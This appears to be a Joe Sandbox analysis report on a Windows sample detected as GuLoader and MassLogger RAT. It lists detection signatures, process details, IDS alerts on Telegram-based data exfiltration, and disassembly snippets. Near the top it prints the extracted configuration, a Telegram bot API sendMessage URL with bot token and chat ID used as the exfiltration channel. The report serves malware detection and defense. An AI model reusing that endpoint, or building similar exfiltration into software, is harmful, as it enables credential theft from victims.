Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2CQ2zMn0hb.exe

Overview

General Information

Sample name:2CQ2zMn0hb.exe
renamed because original name is a hash value
Original sample name:df4f955eb7e72870bf18d39f3dfe1fad5fb9093a080e65f315d215bfec94cc2f.exe
Analysis ID:1588141
MD5:57a8326258e722638fdfab7715e94356
SHA1:ae16c7ecb431ad5775bd0b00c39117756431422b
SHA256:df4f955eb7e72870bf18d39f3dfe1fad5fb9093a080e65f315d215bfec94cc2f
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 2CQ2zMn0hb.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\2CQ2zMn0hb.exe" MD5: 57A8326258E722638FDFAB7715E94356)
    • 2CQ2zMn0hb.exe (PID: 2672 cmdline: "C:\Users\user\Desktop\2CQ2zMn0hb.exe" MD5: 57A8326258E722638FDFAB7715E94356)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2380434486.00000000032B8000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: 2CQ2zMn0hb.exe PID: 2672JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:53:35.981783+010020577441Malware Command and Control Activity Detected192.168.2.549912149.154.167.220443TCP
            2025-01-10T21:53:37.974563+010020577441Malware Command and Control Activity Detected192.168.2.549924149.154.167.220443TCP
            2025-01-10T21:53:39.734489+010020577441Malware Command and Control Activity Detected192.168.2.549939149.154.167.220443TCP
            2025-01-10T21:53:41.380977+010020577441Malware Command and Control Activity Detected192.168.2.549952149.154.167.220443TCP
            2025-01-10T21:53:43.120484+010020577441Malware Command and Control Activity Detected192.168.2.549966149.154.167.220443TCP
            2025-01-10T21:53:44.827470+010020577441Malware Command and Control Activity Detected192.168.2.549978149.154.167.220443TCP
            2025-01-10T21:53:46.523696+010020577441Malware Command and Control Activity Detected192.168.2.549992149.154.167.220443TCP
            2025-01-10T21:53:48.307274+010020577441Malware Command and Control Activity Detected192.168.2.549994149.154.167.220443TCP
            2025-01-10T21:53:50.162912+010020577441Malware Command and Control Activity Detected192.168.2.549996149.154.167.220443TCP
            2025-01-10T21:53:51.745783+010020577441Malware Command and Control Activity Detected192.168.2.549998149.154.167.220443TCP
            2025-01-10T21:53:53.521129+010020577441Malware Command and Control Activity Detected192.168.2.550000149.154.167.220443TCP
            2025-01-10T21:53:55.218536+010020577441Malware Command and Control Activity Detected192.168.2.550002149.154.167.220443TCP
            2025-01-10T21:53:56.899911+010020577441Malware Command and Control Activity Detected192.168.2.550004149.154.167.220443TCP
            2025-01-10T21:53:58.626572+010020577441Malware Command and Control Activity Detected192.168.2.550006149.154.167.220443TCP
            2025-01-10T21:54:00.415285+010020577441Malware Command and Control Activity Detected192.168.2.550008149.154.167.220443TCP
            2025-01-10T21:54:02.010007+010020577441Malware Command and Control Activity Detected192.168.2.550010149.154.167.220443TCP
            2025-01-10T21:54:03.762826+010020577441Malware Command and Control Activity Detected192.168.2.550012149.154.167.220443TCP
            2025-01-10T21:54:05.377072+010020577441Malware Command and Control Activity Detected192.168.2.550014149.154.167.220443TCP
            2025-01-10T21:54:06.949529+010020577441Malware Command and Control Activity Detected192.168.2.550016149.154.167.220443TCP
            2025-01-10T21:54:08.660150+010020577441Malware Command and Control Activity Detected192.168.2.550018149.154.167.220443TCP
            2025-01-10T21:54:10.311142+010020577441Malware Command and Control Activity Detected192.168.2.550020149.154.167.220443TCP
            2025-01-10T21:54:12.148088+010020577441Malware Command and Control Activity Detected192.168.2.550022149.154.167.220443TCP
            2025-01-10T21:54:13.880682+010020577441Malware Command and Control Activity Detected192.168.2.550024149.154.167.220443TCP
            2025-01-10T21:54:15.739463+010020577441Malware Command and Control Activity Detected192.168.2.550026149.154.167.220443TCP
            2025-01-10T21:54:17.396884+010020577441Malware Command and Control Activity Detected192.168.2.550028149.154.167.220443TCP
            2025-01-10T21:54:19.009047+010020577441Malware Command and Control Activity Detected192.168.2.550030149.154.167.220443TCP
            2025-01-10T21:54:20.663616+010020577441Malware Command and Control Activity Detected192.168.2.550032149.154.167.220443TCP
            2025-01-10T21:54:22.334571+010020577441Malware Command and Control Activity Detected192.168.2.550034149.154.167.220443TCP
            2025-01-10T21:54:23.939305+010020577441Malware Command and Control Activity Detected192.168.2.550036149.154.167.220443TCP
            2025-01-10T21:54:25.633403+010020577441Malware Command and Control Activity Detected192.168.2.550038149.154.167.220443TCP
            2025-01-10T21:54:27.275603+010020577441Malware Command and Control Activity Detected192.168.2.550040149.154.167.220443TCP
            2025-01-10T21:54:28.966098+010020577441Malware Command and Control Activity Detected192.168.2.550042149.154.167.220443TCP
            2025-01-10T21:54:30.719533+010020577441Malware Command and Control Activity Detected192.168.2.550044149.154.167.220443TCP
            2025-01-10T21:54:32.680343+010020577441Malware Command and Control Activity Detected192.168.2.550046149.154.167.220443TCP
            2025-01-10T21:54:34.432841+010020577441Malware Command and Control Activity Detected192.168.2.550048149.154.167.220443TCP
            2025-01-10T21:54:36.122209+010020577441Malware Command and Control Activity Detected192.168.2.550050149.154.167.220443TCP
            2025-01-10T21:54:37.976920+010020577441Malware Command and Control Activity Detected192.168.2.550052149.154.167.220443TCP
            2025-01-10T21:54:39.575244+010020577441Malware Command and Control Activity Detected192.168.2.550054149.154.167.220443TCP
            2025-01-10T21:54:41.366751+010020577441Malware Command and Control Activity Detected192.168.2.550056149.154.167.220443TCP
            2025-01-10T21:54:43.154255+010020577441Malware Command and Control Activity Detected192.168.2.550058149.154.167.220443TCP
            2025-01-10T21:54:44.897740+010020577441Malware Command and Control Activity Detected192.168.2.550060149.154.167.220443TCP
            2025-01-10T21:54:46.729765+010020577441Malware Command and Control Activity Detected192.168.2.550062149.154.167.220443TCP
            2025-01-10T21:54:50.540759+010020577441Malware Command and Control Activity Detected192.168.2.550064149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:53:28.377864+010028032742Potentially Bad Traffic192.168.2.549861132.226.247.7380TCP
            2025-01-10T21:53:35.049704+010028032742Potentially Bad Traffic192.168.2.549861132.226.247.7380TCP
            2025-01-10T21:53:36.877827+010028032742Potentially Bad Traffic192.168.2.549919132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:53:22.884979+010028032702Potentially Bad Traffic192.168.2.549827142.250.181.238443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:53:35.731626+010018100081Potentially Bad Traffic192.168.2.549912149.154.167.220443TCP
            2025-01-10T21:53:37.461511+010018100081Potentially Bad Traffic192.168.2.549924149.154.167.220443TCP
            2025-01-10T21:53:39.482257+010018100081Potentially Bad Traffic192.168.2.549939149.154.167.220443TCP
            2025-01-10T21:53:41.069098+010018100081Potentially Bad Traffic192.168.2.549952149.154.167.220443TCP
            2025-01-10T21:53:42.706837+010018100081Potentially Bad Traffic192.168.2.549966149.154.167.220443TCP
            2025-01-10T21:53:44.469261+010018100081Potentially Bad Traffic192.168.2.549978149.154.167.220443TCP
            2025-01-10T21:53:46.165705+010018100081Potentially Bad Traffic192.168.2.549992149.154.167.220443TCP
            2025-01-10T21:53:47.899210+010018100081Potentially Bad Traffic192.168.2.549994149.154.167.220443TCP
            2025-01-10T21:53:49.714041+010018100081Potentially Bad Traffic192.168.2.549996149.154.167.220443TCP
            2025-01-10T21:53:51.487456+010018100081Potentially Bad Traffic192.168.2.549998149.154.167.220443TCP
            2025-01-10T21:53:53.072656+010018100081Potentially Bad Traffic192.168.2.550000149.154.167.220443TCP
            2025-01-10T21:53:54.852859+010018100081Potentially Bad Traffic192.168.2.550002149.154.167.220443TCP
            2025-01-10T21:53:56.551895+010018100081Potentially Bad Traffic192.168.2.550004149.154.167.220443TCP
            2025-01-10T21:53:58.235121+010018100081Potentially Bad Traffic192.168.2.550006149.154.167.220443TCP
            2025-01-10T21:53:59.990628+010018100081Potentially Bad Traffic192.168.2.550008149.154.167.220443TCP
            2025-01-10T21:54:01.743321+010018100081Potentially Bad Traffic192.168.2.550010149.154.167.220443TCP
            2025-01-10T21:54:03.311177+010018100081Potentially Bad Traffic192.168.2.550012149.154.167.220443TCP
            2025-01-10T21:54:05.099974+010018100081Potentially Bad Traffic192.168.2.550014149.154.167.220443TCP
            2025-01-10T21:54:06.699169+010018100081Potentially Bad Traffic192.168.2.550016149.154.167.220443TCP
            2025-01-10T21:54:08.299177+010018100081Potentially Bad Traffic192.168.2.550018149.154.167.220443TCP
            2025-01-10T21:54:09.997332+010018100081Potentially Bad Traffic192.168.2.550020149.154.167.220443TCP
            2025-01-10T21:54:11.647843+010018100081Potentially Bad Traffic192.168.2.550022149.154.167.220443TCP
            2025-01-10T21:54:13.504537+010018100081Potentially Bad Traffic192.168.2.550024149.154.167.220443TCP
            2025-01-10T21:54:15.227888+010018100081Potentially Bad Traffic192.168.2.550026149.154.167.220443TCP
            2025-01-10T21:54:17.083559+010018100081Potentially Bad Traffic192.168.2.550028149.154.167.220443TCP
            2025-01-10T21:54:18.772286+010018100081Potentially Bad Traffic192.168.2.550030149.154.167.220443TCP
            2025-01-10T21:54:20.363513+010018100081Potentially Bad Traffic192.168.2.550032149.154.167.220443TCP
            2025-01-10T21:54:22.025052+010018100081Potentially Bad Traffic192.168.2.550034149.154.167.220443TCP
            2025-01-10T21:54:23.642541+010018100081Potentially Bad Traffic192.168.2.550036149.154.167.220443TCP
            2025-01-10T21:54:25.293495+010018100081Potentially Bad Traffic192.168.2.550038149.154.167.220443TCP
            2025-01-10T21:54:27.013839+010018100081Potentially Bad Traffic192.168.2.550040149.154.167.220443TCP
            2025-01-10T21:54:28.650344+010018100081Potentially Bad Traffic192.168.2.550042149.154.167.220443TCP
            2025-01-10T21:54:30.290587+010018100081Potentially Bad Traffic192.168.2.550044149.154.167.220443TCP
            2025-01-10T21:54:32.057964+010018100081Potentially Bad Traffic192.168.2.550046149.154.167.220443TCP
            2025-01-10T21:54:34.032254+010018100081Potentially Bad Traffic192.168.2.550048149.154.167.220443TCP
            2025-01-10T21:54:35.760434+010018100081Potentially Bad Traffic192.168.2.550050149.154.167.220443TCP
            2025-01-10T21:54:37.461689+010018100081Potentially Bad Traffic192.168.2.550052149.154.167.220443TCP
            2025-01-10T21:54:39.285866+010018100081Potentially Bad Traffic192.168.2.550054149.154.167.220443TCP
            2025-01-10T21:54:40.970394+010018100081Potentially Bad Traffic192.168.2.550056149.154.167.220443TCP
            2025-01-10T21:54:42.732052+010018100081Potentially Bad Traffic192.168.2.550058149.154.167.220443TCP
            2025-01-10T21:54:44.467248+010018100081Potentially Bad Traffic192.168.2.550060149.154.167.220443TCP
            2025-01-10T21:54:46.270205+010018100081Potentially Bad Traffic192.168.2.550062149.154.167.220443TCP
            2025-01-10T21:54:50.129484+010018100081Potentially Bad Traffic192.168.2.550064149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 2CQ2zMn0hb.exeAvira: detected
            Source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
            Source: 2CQ2zMn0hb.exe.2672.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
            Source: 2CQ2zMn0hb.exeReversingLabs: Detection: 60%
            Source: 2CQ2zMn0hb.exeVirustotal: Detection: 76%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348AD1EC CryptUnprotectData,3_2_348AD1EC
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348AD9D9 CryptUnprotectData,3_2_348AD9D9
            Source: 2CQ2zMn0hb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49871 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:49827 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.2.5:49835 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49912 version: TLS 1.2
            Source: 2CQ2zMn0hb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_0040672B FindFirstFileW,FindClose,3_2_0040672B
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405AFA
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348A1042h3_2_348A0C28
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348AC985h3_2_348AC638
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348A0671h3_2_348A03C4
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348AB791h3_2_348AB4EC
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348A1042h3_2_348A0C1A
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348AC041h3_2_348ABD88
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348AE198h3_2_348ADEE1
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348AEA48h3_2_348AE790
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348A1042h3_2_348A0F6F
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348AF2F8h3_2_348AF042
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348AB339h3_2_348AB07F
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348AC499h3_2_348AC1F2
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348ABBE9h3_2_348AB944
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348ADD40h3_2_348ADA89
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348AEEA0h3_2_348AEBF2
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 348AE5F0h3_2_348AE339
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 3763882Dh3_2_37638650
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 376391B7h3_2_37638650
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then push 00000000h3_2_3763BDF0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37634218h3_2_37633F70
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 376361B8h3_2_37635F10
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37636A68h3_2_376367C0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37631250h3_2_37630FA8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37635908h3_2_37635660
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 376330B8h3_2_37632E10
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37633968h3_2_376336C0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37632808h3_2_37632560
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37635058h3_2_37634DB0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 376316A8h3_2_37631400
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37636EC0h3_2_37636C18
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37637770h3_2_376374C8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37631F58h3_2_37631CB0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37636610h3_2_37636368
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_37637B4F
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37633DC0h3_2_37633B18
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37634670h3_2_376343C8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37633510h3_2_37633268
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 376354B0h3_2_37635208
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37635D60h3_2_37635AB8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 376323B0h3_2_37632108
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37632C60h3_2_376329B8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37637318h3_2_37637070
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37631B00h3_2_37631858
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then jmp 37634ACAh3_2_37634820
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then push 00000000h3_2_37B6E7C8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]3_2_37B6F5D8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 4x nop then push 00000000h3_2_37B6F316

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49998 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49998 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50010 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50010 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49912 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50012 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50012 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50038 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50038 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50056 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50056 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49952 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49912 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49994 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49952 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50058 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49994 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50058 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49966 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49966 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50028 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50032 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50028 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50032 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50018 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50018 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50030 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50030 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49939 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49939 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50020 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49924 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50026 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49924 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50026 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50020 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50064 -> 149.154.167.220:443
